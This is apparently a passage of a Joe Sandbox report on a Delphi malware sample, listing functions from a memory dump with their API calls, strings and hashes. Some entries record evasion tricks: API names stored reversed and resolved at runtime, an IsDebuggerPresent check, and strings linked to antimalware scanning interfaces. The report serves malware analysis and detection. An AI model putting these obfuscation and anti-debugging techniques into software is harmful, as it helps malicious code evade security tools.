Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
API String ID: 667068680-2233174745
Opcode ID: 09132a0de7ec6b043d61ae894710831bcf23327d6bfa17e4ff0e30919db63de8
Instruction ID: 1b3370d375e9555e3dfc35b3b3e3d9374a6d44537bd162c58007a3052e27a610
Opcode Fuzzy Hash: 09132a0de7ec6b043d61ae894710831bcf23327d6bfa17e4ff0e30919db63de8
Instruction Fuzzy Hash: A4F050EDAC93296EB3407F799CC18372B9DED80B0471019257A62955C3FB79C4348F62

Function 028F2530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 028F28CE

Strings

bytes: , xrefs: 028F275D
Unknown, xrefs: 028F278C
An unexpected memory leak has occurred. , xrefs: 028F2690
7, xrefs: 028F26A1
String, xrefs: 028F27A1
The sizes of unexpected leaked medium and large blocks are: , xrefs: 028F2849
Unexpected Memory Leak, xrefs: 028F28C0
, xrefs: 028F2814
The unexpected small block leaks are:, xrefs: 028F2707

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: Message
String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
API String ID: 2030045667-32948583
Opcode ID: 192077654c6fac23814f18b27f6974d0562bd89515160c65744d80855103151a
Instruction ID: ae8c5ce372055554c8aefb0470976875c33295be72b0cd761154d0917301e631
Opcode Fuzzy Hash: 192077654c6fac23814f18b27f6974d0562bd89515160c65744d80855103151a
Instruction Fuzzy Hash: 17A1E53CB042688BDBA1AA2CCC80BD9B7E5EB09314F1441E5DE4DDB28ACB7599C5CF51

Function 028F252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON

Download Yara Rule

Strings

bytes: , xrefs: 028F275D
An unexpected memory leak has occurred. , xrefs: 028F2690
7, xrefs: 028F26A1
The sizes of unexpected leaked medium and large blocks are: , xrefs: 028F2849
Unexpected Memory Leak, xrefs: 028F28C0
, xrefs: 028F2814
The unexpected small block leaks are:, xrefs: 028F2707

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID:
String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
API String ID: 0-2723507874
Opcode ID: 7498970b259ca7980d63c43121190f52708605035c9f17725d96276152fb36e1
Instruction ID: 24a5ecf6f8801e72f6ef8cd9a6af3871800727eea30380ead6345f3ef6b55765
Opcode Fuzzy Hash: 7498970b259ca7980d63c43121190f52708605035c9f17725d96276152fb36e1
Instruction Fuzzy Hash: 7A71D33CB042988FDBA19A2CCC84BD8BBE5EB09314F1041E5DA4DDB28ADB7559C5CF52

Function 028FBD40 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000000,028FC00B,?,?,00000000,00000000), ref: 028FBD76

Part of subcall function 028FA744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 028FA762

Strings

AMPM, xrefs: 028FBF8A
AMPM , xrefs: 028FBF99
mmmm d, yyyy, xrefs: 028FBE72
:mm, xrefs: 028FBFA9
m/d/yy, xrefs: 028FBE45
:mm:ss, xrefs: 028FBFC6

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: 5ce5e5d5d429b7137288fa5b7d0286ef6f60677ccb8f1883c2a18e503839caf5
Instruction ID: 7b41a7baf7cf0f13e338e61a2d25f9bff165f3e5211d20c70146a94ae1dab1d8
Opcode Fuzzy Hash: 5ce5e5d5d429b7137288fa5b7d0286ef6f60677ccb8f1883c2a18e503839caf5
Instruction Fuzzy Hash: 0B61513CB002489BDB84EBACD850BDF77B7DB88300F1094369705DB745DA39DA1A9B66

Function 0290AE18 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004), ref: 0290AE38
GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 0290AE4F
IsBadReadPtr.KERNEL32(?,00000004), ref: 0290AEE3
IsBadReadPtr.KERNEL32(?,00000002), ref: 0290AEEF
IsBadReadPtr.KERNEL32(?,00000014), ref: 0290AF03

Strings

KernelBase, xrefs: 0290AE4A
LoadLibraryExA, xrefs: 0290AE45

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: Read$HandleModule
String ID: KernelBase$LoadLibraryExA
API String ID: 2226866862-113032527
Opcode ID: 3d9ac90a2179532ec7f787a63243ff6e8f4e48d34a914843ffa9f18c21914139
Instruction ID: 9cff3d0bb42cd84e5528063318d9682f890afb6aaf3657d8bbfc056436959421
Opcode Fuzzy Hash: 3d9ac90a2179532ec7f787a63243ff6e8f4e48d34a914843ffa9f18c21914139
Instruction Fuzzy Hash: B7311CB6A40309AFDB20DB68CCC5F9A77ACAF04764F004520EB54DB2C1D774A940CBE1

Function 028F432C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028F43F3,?,?,029517C8,?,?,0291E7A8,028F655D,0291D30D), ref: 028F4365
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028F43F3,?,?,029517C8,?,?,0291E7A8,028F655D,0291D30D), ref: 028F436B
GetStdHandle.KERNEL32(000000F5,028F43B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028F43F3,?,?,029517C8), ref: 028F4380
WriteFile.KERNEL32(00000000,000000F5,028F43B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028F43F3,?,?), ref: 028F4386
MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 028F43A4

Strings

Runtime error at 00000000, xrefs: 028F435E, 028F439D
Error, xrefs: 028F4398

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: fa5469ef51a0dd91d32e922f8fb1e5a138c0b310d5d4ef060aa6016cc2a61fb8
Instruction ID: 1352a73204b6a299102d4ddb069d7223bba72d5f2fb405443a156de7378fa2e3
Opcode Fuzzy Hash: fa5469ef51a0dd91d32e922f8fb1e5a138c0b310d5d4ef060aa6016cc2a61fb8
Instruction Fuzzy Hash: A8F0B46DAC8345B9FA50A264AC09FAA279C4B84F20F584A06BB68E44C0C7A450C48B67

Function 028FAE44 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 028FACBC: VirtualQuery.KERNEL32(?,?,0000001C), ref: 028FACD9
Part of subcall function 028FACBC: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 028FACFD
Part of subcall function 028FACBC: GetModuleFileNameA.KERNEL32(028F0000,?,00000105), ref: 028FAD18
Part of subcall function 028FACBC: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 028FADAE

CharToOemA.USER32(?,?), ref: 028FAE7B
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 028FAE98
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 028FAE9E
GetStdHandle.KERNEL32(000000F4,028FAF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 028FAEB3
WriteFile.KERNEL32(00000000,000000F4,028FAF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 028FAEB9
LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 028FAEDB
MessageBoxA.USER32(00000000,?,?,00002010), ref: 028FAEF1

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
String ID:
API String ID: 185507032-0
Opcode ID: 82b33c3adfbba80c0e1c3f3edf1751c46f2e7179f8ee49801308684caf710e4d
Instruction ID: cbdb84b3b120b5651e8c40e1a6e8acb90e4c5428bc66eb189e85ee69cf4b166b
Opcode Fuzzy Hash: 82b33c3adfbba80c0e1c3f3edf1751c46f2e7179f8ee49801308684caf710e4d
Instruction Fuzzy Hash: 2A1170BE5582047AD380EB98CC80F9B77EDAB44310F400A29B364D60D0EB74E9448F77

Function 028FE50C Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 028FE5A5
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 028FE5C1
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 028FE5FA
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 028FE677
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 028FE690
VariantCopy.OLEAUT32(?,00000000), ref: 028FE6C5

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-0
Opcode ID: 2c879650c84341011691a20226c27d6524aee0beb2559d3f6bcac5042424fc10
Instruction ID: be464917c49a7a8d744e7179dcf88fa339b9c3c0a8af4c3503efb2659c2af7a6
Opcode Fuzzy Hash: 2c879650c84341011691a20226c27d6524aee0beb2559d3f6bcac5042424fc10
Instruction Fuzzy Hash: F051A67D90062D9BCBA2DB58CC80AD9B3BDAF4D304F0441D5EB09E7216DA34AF858F65

Function 028F3568 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028F358A
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,028F35D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028F35BD
RegCloseKey.ADVAPI32(?,028F35E0,00000000,?,00000004,00000000,028F35D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028F35D3

Strings

FPUMaskValue, xrefs: 028F35B4
SOFTWARE\Borland\Delphi\RTL, xrefs: 028F3580

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: 5e38341b2ab0224eda170deec92cb0e767cbd4dff9580eea84c1b5c2ee16356e
Instruction ID: 2bc503d7480833372d2aa67e5ad0c1cd6ecf19ef3c1e5883965d23d3d6a55cfa
Opcode Fuzzy Hash: 5e38341b2ab0224eda170deec92cb0e767cbd4dff9580eea84c1b5c2ee16356e
Instruction Fuzzy Hash: DD01B57D944248BAF751DBD18D02BBD77FCD708B10F1005A1FF04D6680E679A610DA59

Function 029080C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02908148,?,?,00000000,00000000,?,02908061,00000000,KernelBASE,00000000,00000000,02908088), ref: 0290810D
GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02908113
GetProcAddress.KERNEL32(?,?), ref: 02908125

Strings

sserddAcorPteG, xrefs: 029080DB
Kernel32, xrefs: 02908108

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: Kernel32$sserddAcorPteG
API String ID: 667068680-1372893251
Opcode ID: 2d9efe0b20670aa7bb04f3913b173becdfc2dabbfcc08dbd2213e2c49daa54a1
Instruction ID: 1656dea5703184e178b79c81e81ce08105d02a188fac54cba2c2c4264a731189
Opcode Fuzzy Hash: 2d9efe0b20670aa7bb04f3913b173becdfc2dabbfcc08dbd2213e2c49daa54a1
Instruction Fuzzy Hash: 8C01447DB44308AFE744EBA8D881A5E77EEEF89B10F514465AA00D7690D634AD108B51

Function 028FA9D0 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,028FAA67,?,?,00000000), ref: 028FA9E8

Part of subcall function 028FA744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 028FA762

GetThreadLocale.KERNEL32(00000000,00000004,00000000,028FAA67,?,?,00000000), ref: 028FAA18
EnumCalendarInfoA.KERNEL32(Function_0000A91C,00000000,00000000,00000004), ref: 028FAA23
GetThreadLocale.KERNEL32(00000000,00000003,00000000,028FAA67,?,?,00000000), ref: 028FAA41
EnumCalendarInfoA.KERNEL32(Function_0000A958,00000000,00000000,00000003), ref: 028FAA4C

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: 0c700fde9e090d98cf64ec5c564069b771d6e1d0ff8218d02de03b0314439d08
Instruction ID: 6c6ffd32daf7656965314476927a1b69753fa8650542a4f78dad7e200c631e59
Opcode Fuzzy Hash: 0c700fde9e090d98cf64ec5c564069b771d6e1d0ff8218d02de03b0314439d08
Instruction Fuzzy Hash: 1601F73C3403546FF785EA6C8D12F6E735DDB46730F910220F728E6784E5689E144A66

Function 028FAA80 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,028FAC50,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 028FAAAF

Part of subcall function 028FA744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 028FA762

Strings

yyyy, xrefs: 028FABA5
eeee, xrefs: 028FABBE
ggg, xrefs: 028FAB95

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: 3db0f67b43536bfbf4541a60811470dbb7a3b2636f2bbc88323f1682e47f63ff
Instruction ID: 80db7a9d927ff1107c8a73aabfd80ac7b503faa002d824252544c30f2c1124a9
Opcode Fuzzy Hash: 3db0f67b43536bfbf4541a60811470dbb7a3b2636f2bbc88323f1682e47f63ff
Instruction Fuzzy Hash: 8041F53C3042094BE7D9EB6D888067FB3EBDB85224B504526D75EC7344EA78D909CA22

Function 02908018 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02908088,?,?,00000000,?,029079FE,ntdll,00000000,00000000,02907A43,?,?,00000000), ref: 02908056

Part of subcall function 029080C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02908148,?,?,00000000,00000000,?,02908061,00000000,KernelBASE,00000000,00000000,02908088), ref: 0290810D
Part of subcall function 029080C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02908113
Part of subcall function 029080C0: GetProcAddress.KERNEL32(?,?), ref: 02908125

GetModuleHandleA.KERNELBASE(?), ref: 0290806A

Strings

KernelBASE, xrefs: 02908051
AeldnaHeludoMteG, xrefs: 02908031

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: HandleModule$AddressProc
String ID: AeldnaHeludoMteG$KernelBASE
API String ID: 1883125708-1952140341
Opcode ID: 1f6d93528671e3b564f4fde53bf9424e42643e50f9ec31f0de18938d9746b8b2
Instruction ID: 9425035ec733240abbb5707aae9e694ef073519a7afe95c9fe40ecd71006aae6
Opcode Fuzzy Hash: 1f6d93528671e3b564f4fde53bf9424e42643e50f9ec31f0de18938d9746b8b2
Instruction Fuzzy Hash: 86F06239B44708EFE740EFA8DC81DAA77ADF789B007914561FA00D3690E670BD109A65

Function 0290EFC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KernelBase,?,0290F3CC,UacInitialize,0295237C,0291B40C,UacScan,0295237C,0291B40C,ScanBuffer,0295237C,0291B40C,OpenSession,0295237C,0291B40C,ScanString), ref: 0290EFCE
GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0290EFE0

Strings

KernelBase, xrefs: 0290EFC9
IsDebuggerPresent, xrefs: 0290EFDA

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsDebuggerPresent$KernelBase
API String ID: 1646373207-2367923768
Opcode ID: 6b12554e297be3687fdc950ab291e9ee1f3bec45a5a434e449796b29c857a911
Instruction ID: 4656af1767384fc6596a1d778f37a7533e3f044b8fda50bd2216a34bc9379bb4
Opcode Fuzzy Hash: 6b12554e297be3687fdc950ab291e9ee1f3bec45a5a434e449796b29c857a911
Instruction Fuzzy Hash: 44D0126A3553741DB51037F81CC581D134C8D855697200F30F272D51D3FA6B88611111

Function 028FC3F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,0291D10B,00000000,0291D11E), ref: 028FC3FA
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 028FC40B

Strings

kernel32.dll, xrefs: 028FC3F5
GetDiskFreeSpaceExA, xrefs: 028FC405

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: 42fe187811693caed4b705fdab3c8b8df90bb01d5d07c9eb5a2caf3eefff4755
Instruction ID: f223eeb389e22dd7ea2cfb33bf6f7b549cd08a4086959129f58d9b5a01239cdf
Opcode Fuzzy Hash: 42fe187811693caed4b705fdab3c8b8df90bb01d5d07c9eb5a2caf3eefff4755
Instruction Fuzzy Hash: E6D0A76CE4431A4EF780EFF66C8163637C89724305F00D866E755D5202E7B94518CF60

Function 028FE168 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 028FE217
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 028FE233
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 028FE2AA
VariantClear.OLEAUT32(?), ref: 028FE2D3

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant
String ID:
API String ID: 920484758-0
Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction ID: 6ae4c045219c3b796b331452accd82b993e293b32fcb34f79c49afafc8967b2b
